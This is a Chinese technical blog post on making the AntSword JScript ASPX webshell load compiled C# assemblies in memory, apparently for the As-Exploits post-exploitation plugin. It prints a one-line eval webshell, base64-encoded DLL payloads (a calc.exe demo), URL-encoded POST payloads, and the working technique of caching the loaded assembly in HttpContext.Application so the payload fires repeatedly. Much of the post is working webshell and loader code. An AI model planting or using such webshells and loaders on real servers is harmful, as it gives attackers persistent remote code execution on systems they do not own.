Jscript加载Assembly踩坑记

yzddMr6 收录于类别技术文章

2021-01-27 2021-01-27 约 2562 字预计阅读 6 分钟

1 前言

最近想要给As-Exploits增加aspx类型的支持，就研究了一下冰蝎跟哥斯拉的实现。

由于冰蝎跟哥斯拉都采用的C#类型的shell，所以可以直接调用系统的一些api，并且可以加载任意的shellcode。而蚁剑采用的是传统的Jscript。就想找个办法把它们两者结合起来，用Jscript加载C#的assembly，以此来达到兼容原有shell类型的目的。

但是在实现的过程中踩了一些坑，所以就写下这篇文章记录一下。

2 理论支持

2.1 Assembly

这里要先提到一个概念叫Assembly，引用一下rebeyond师傅文章中的话：https://xz.aliyun.com/t/2758

在Java中，每个类经过编译之后都单独对应一个class文件，而在.net中则不同，.net中不存在单个类对应的二进制文件，而是引入了一个叫做Assembly（程序集）的概念，已编译的类是以Assembly的形式来承载的，Assembly是供CLR执行的可执行文件。在.NET下，托管的DLL和EXE都称之为Assembly，一个Assembly可以包含多个类。

java跟.net有很多相似之处，这里我们可以简单的理解为：.net中的assembly就像java中的class。java中使用defineClass来加载一个类到jvm内存中，同样，.net中可以使用Assembly.Load来把assembly加载到内存中。

2.2 从Jscript到C#

蚁剑用的是Jscript，然而冰蝎哥斯拉用的C#，那么能否用Jscript去调用C#呢？

答案是可以的，这里附一张.net framework的框架图

可以看到最顶层的如C#,VB,Jscript等语言，他们的底层框架都是通用的，都是在.net framework这个体系内。所以C#编译成的assembly在Jscript中是可以通用的。

那么Jscript如何将其加载进去呢？由于其中部分基类库Base Class Library(BCL)是共有的。而Assembly.Load刚好在System.Reflection这个命名空间下面，所以我们就可以在Jscript中调用System.Reflection.Assembly.Load来把C#的assembly加载到内存中。

这里可能会有同学问了，既然Jscript也是一门独立的语言，理论上C#能实现的他都能实现，为什么还要大费周折再去加载C#呢？

其实也不是没有想过直接用Jscript写。。。但是在实现的过程中发现太蛋疼了，Jscript基本搜不到什么文档，报错也搜不到，本人测试过VS，VS code，rider，都没有Jscript的补全跟高亮，开发起来非常难受。另外一个原因是很多开源工具都用的C#实现，采用assembly加载的方式稍微修改一下就可以快速复用。

3 踩坑过程

前面扯了这么多主要是理论，当然实现中没有这么顺利。

首先新建一个Class Library项目，这里以弹计算器为例。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


using System.Diagnostics;

namespace AntPayload
{
    public class Run
    {
        public override bool Equals(object obj)
        {
            Process.Start("calc.exe");
            return true;
        }
    }
}

项目自动编译或者手动编译为dll

1

csc /t:library AntPayload.cs

base64一下

1

base64 -w 0 AntPayload.dll > AntPayload.txt

Payload

1

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAEXJD2AAAAAAAAAAAOAAIiALATAAAAgAAAAGAAAAAAAANicAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQmAABPAAAAAEAAAIgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAACsJQAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAPAcAAAAgAAAACAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAIgDAAAAQAAAAAQAAAAKAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAADgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAYJwAAAAAAAEgAAAACAAUAaCAAAEQFAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADZyAQAAcCgOAAAKJhcqHgIoDwAACioAAEJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAAAAUAbAAAAMwBAAAjfgAAOAIAACQCAAAjU3RyaW5ncwAAAABcBAAAFAAAACNVUwBwBAAAEAAAACNHVUlEAAAAgAQAAMQAAAAjQmxvYgAAAAAAAAACAAABRxUAAAkAAAAA+gEzABYAAAEAAAAQAAAAAgAAAAIAAAABAAAADwAAAA0AAAABAAAAAgAAAAAAbgEBAAAAAAAGAN8AzgEGAEwBzgEGACwAnAEPAO4BAAAGAFQAhAEGAMIAhAEGAKMAhAEGADMBhAEGAP8AhAEGABgBhAEGAGsAhAEGAEAArwEGAB4ArwEGAIYAhAEGAAwCfQEKAAQCnAEAAAAAAQAAAAAAAQABAAEAEAAZAhMAPQABAAEAUCAAAAAAxgD9ASkAAQBeIAAAAACGGJYBBgACAAAAAQBqAQkAlgEBABEAlgEGABkAlgEKACkAlgEQADEAlgEQADkAlgEQAEEAlgEQAEkAlgEQAFEAlgEQAFkAlgEQAGEAlgEVAGkAlgEQAHEAlgEQAIEAEwIaAHkAlgEGAC4ACwAuAC4AEwA3AC4AGwBWAC4AIwBfAC4AKwBvAC4AMwBvAC4AOwBvAC4AQwBfAC4ASwB1AC4AUwBvAC4AWwBvAC4AYwCNAC4AawC3AASAAAABAAAAAAAAAAAAAAAAABMAAAACAAAAAAAAAAAAAAAgAAoAAAAAAAIAAAAAAAAAAAAAACAAfQEAAAAAAAAAPE1vZHVsZT4AbXNjb3JsaWIAQW50UGF5bG9hZABHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAG9iagBBbnRQYXlsb2FkLmRsbABTeXN0ZW0AU3lzdGVtLlJlZmxlY3Rpb24ALmN0b3IAU3lzdGVtLkRpYWdub3N0aWNzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAEVxdWFscwBQcm9jZXNzAE9iamVjdABTdGFydABSdW5UZXN0AAAAAAARYwBhAGwAYwAuAGUAeABlAAAADuw7XR6MQkeND6FGq61D8gAEIAEBCAMgAAEFIAEBEREEIAEBDgQgAQECBQABEkEOCLd6XFYZNOCJBCABAhwIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBCAEAAgAAAAAADwEACkFudFBheWxvYWQAAAUBAAAAABcBABJDb3B5cmlnaHQgwqkgIDIwMjEAACkBACQ1MzE2OEVCNi04QTE4LTQwM0UtQkM0Ni1CRjU2NUZEQTFBRTYAAAwBAAcxLjAuMC4wAAAAAAAARckPYAAAAAACAAAAHAEAAMglAADIBwAAUlNEU8baoqhTlGdMk7YSVd9Yd5wBAAAARDpcUmlkZXJQcm9qZWN0c1xEbGxUZXN0XEFudFBheWxvYWRcb2JqXFJlbGVhc2VcQW50UGF5bG9hZC5wZGIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMJwAAAAAAAAAAAAAmJwAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGCcAAAAAAAAAAAAAAABfQ29yRGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAAAAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhAAAAsAwAAAAAAAAAAAAAsAzQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAEAAAAAAAAAAQAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAEjAIAAAEAUwB0AHIAaQBuAGcARgBpAGwAZQBJAG4AZgBvAAAAaAIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBvAG0AbQBlAG4AdABzAAAAAAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAAAAAAAD4ACwABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABBAG4AdABQAGEAeQBsAG8AYQBkAAAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAAA+AA8AAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEEAbgB0AFAAYQB5AGwAbwBhAGQALgBkAGwAbAAAAAAASAASAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBvAHAAeQByAGkAZwBoAHQAIACpACAAIAAyADAAMgAxAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAAAABGAA8AAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQQBuAHQAUABhAHkAbABvAGEAZAAuAGQAbABsAAAAAAA2AAsAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEEAbgB0AFAAYQB5AGwAbwBhAGQAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAADg3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

新建web项目，建立test.aspx测试一下

1
2
3
4
5
6
7


<%@ Page Language="Jscript" Debug=true%>
<%
    var Payload =Request.Form("data");
    var myAssebly = System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));
    var myPaylaod=myAssebly.CreateInstance("AntPayload.Run").Equals(this);
    myPaylaod.Equals(this);
%>

POST：

1

data=xxxx(上文中的payload)

可以证实我们的猜想是成功的，可以用Jscript调用System.Reflection.Assembly.Load执行C#的payload。

由于蚁剑的aspx一句话是基于jscript的eval的，所以还要通过一层eval给他传进去。

web项目中新建base.aspx

1

<%@ Page Language="Jscript" Debug=true%><%eval(Request.Item["ant"],"unsafe");%>

POST:

1

ant=var%20Payload%20%3D%22xxxxxxxxx%22%3B%0Avar%20myAssebly%20%3D%20System.Reflection.Assembly.Load(Convert.FromBase64String(Payload))%3B%0Avar%20myPaylaod%3DmyAssebly.CreateInstance(%22AntPayload.Run%22).Equals(this)%3B%0AmyPaylaod.Equals(this)%3B

发现第一次是可以正常调用的

但是第二次执行就会提示下面的错误

1

[A]AntPayload.Run 无法强制转换为 [B]AntPayload.Run。类型 A 源自“AntPayload, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null”(在字节数组的上下文“LoadNeither”中)。类型 B 源自“AntPayload, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null”(在字节数组的上下文“LoadNeither”中)。

搜了一下发现没有什么有用的回答，猜测大概是跟java中类重复加载一样的报错。

所以就加了一层判断，如果当前存在 AntPayload.Run 这个类型的assembly就不重复进行加载。

新建项目test0.aspx测试一下

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23


 <%@ Page Language="Jscript" Debug=true%>
<%
 var Payload="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAP2QD2AAAAAAAAAAAOAAIiALATAAAAgAAAAGAAAAAAAAMicAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOAmAABPAAAAAEAAAIgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAACoJQAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAOAcAAAAgAAAACAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAIgDAAAAQAAAAAQAAAAKAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAADgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAUJwAAAAAAAEgAAAACAAUAaCAAAEAFAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADZyAQAAcCgOAAAKJhcqHgIoDwAACioAAEJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAAAAUAbAAAAMwBAAAjfgAAOAIAACACAAAjU3RyaW5ncwAAAABYBAAAFAAAACNVUwBsBAAAEAAAACNHVUlEAAAAfAQAAMQAAAAjQmxvYgAAAAAAAAACAAABRxUAAAkAAAAA+gEzABYAAAEAAAAQAAAAAgAAAAIAAAABAAAADwAAAA0AAAABAAAAAgAAAAAAbgEBAAAAAAAGAN8A0gEGAEwB0gEGACwAoAEPAPIBAAAGAFQAhAEGAMIAhAEGAKMAhAEGADMBhAEGAP8AhAEGABgBhAEGAGsAhAEGAEAAswEGAB4AswEGAIYAhAEGABACfQEKAAgCoAEAAAAAAQAAAAAAAQABAAEAEACWARMAPQABAAEAUCAAAAAAxgABAikAAQBeIAAAAACGGJoBBgACAAAAAQBqAQkAmgEBABEAmgEGABkAmgEKACkAmgEQADEAmgEQADkAmgEQAEEAmgEQAEkAmgEQAFEAmgEQAFkAmgEQAGEAmgEVAGkAmgEQAHEAmgEQAIEAFwIaAHkAmgEGAC4ACwAuAC4AEwA3AC4AGwBWAC4AIwBfAC4AKwBvAC4AMwBvAC4AOwBvAC4AQwBfAC4ASwB1AC4AUwBvAC4AWwBvAC4AYwCNAC4AawC3AASAAAABAAAAAAAAAAAAAAAAABMAAAACAAAAAAAAAAAAAAAgAAoAAAAAAAIAAAAAAAAAAAAAACAAfQEAAAAAAAAAPE1vZHVsZT4AbXNjb3JsaWIAQW50UGF5bG9hZABHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAG9iagBBbnRQYXlsb2FkLmRsbABTeXN0ZW0AU3lzdGVtLlJlZmxlY3Rpb24AUnVuAC5jdG9yAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBFcXVhbHMAUHJvY2VzcwBPYmplY3QAU3RhcnQAAAAAABFjAGEAbABjAC4AZQB4AGUAAAA945IL3EDlTKxPqJUA/SMAAAQgAQEIAyAAAQUgAQEREQQgAQEOBCABAQIFAAESQQ4It3pc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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="; 
    var type = Type.GetType("AntPayload.Run");
    if (type != null)
    {
        Response.Write(type + " exists");
        //var obj=System.Activator.CreateInstance(type);
        //obj.Equals("");
        var assembly = System.Reflection.Assembly.GetExecutingAssembly();
        var obj = assembly.CreateInstance("AntPayload.Run");
        obj.Equals("");
    }
    else
    {
        Response.Write(type + " not exists");
        var myAssebly = System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));
        var myPaylaod = myAssebly.CreateInstance("AntPayload.Run");
        myPaylaod.Equals("");
        //myAssebly.GetType("AntPayload.Run").GetConstructor(new Type[0]).Invoke(null).Equals("");
        
    }
%>

发现 Type.GetType 永远为undefined。以为是函数用的不对，后来又换了System.Reflection.Assembly.GetCallingAssembly().GetType，System.Reflection.Assembly.GetExecutingAssembly().GetType都不行。

接着发现虽然把代码直接写在jscript中可以多次稳定触发，如果把以上代码通过eval打进入仍然会报上面类型转换的错误。

另外还发现一些奇怪的地方，如果直接代码写在jscript文件中可以用这种写法：

1
2


        var obj=System.Activator.CreateInstance(type);
        obj.Equals("");

但是如果通过eval传进去就只能用这种写法

1
2
3


        var assembly = System.Reflection.Assembly.GetExecutingAssembly();
        var obj = assembly.CreateInstance("AntPayload.Run");
        obj.Equals("");

否则会报如下错误，谷歌也没查到怎么解决，神秘。

4 问题解决

试了很多办法都失败了，后来谷歌搜到了一篇2012年的博客遇到了同样的问题，大概意思是说两次的assembly被加载到了不同的上下文中，所以被当作成为不同的类，无法进行类型转换。

跟北辰师傅研究了一番后，北辰师傅想到一种方法：把第一次加载后的assembly的引用给存到当前Application的上下文中，即HttpContext.Current.Application这个类里面，然后再通过Application.Get(“ant”)拿到引用，然后反射，再获取实例化，这样就可以解决上下文不同的问题。

payload修改如下

1
2
3


var Payload="xxxxx";
HttpContext.Current.Application.Add("ant", System.Reflection.Assembly.Load(Convert.FromBase64String(Payload)));
HttpContext.Current.Application.Get("ant").GetType("AntPayload.Run").GetConstructor(new Type[0]).Invoke(null).Equals(this);

然后通过eval打过去，此时就可以多次稳定触发payload了。

5 最后

特别感谢北辰师傅的交流探讨！

初学.net，有些地方是凭借自己的理解写的，如果有说的不对的地方欢迎指出，以免误导他人。

目录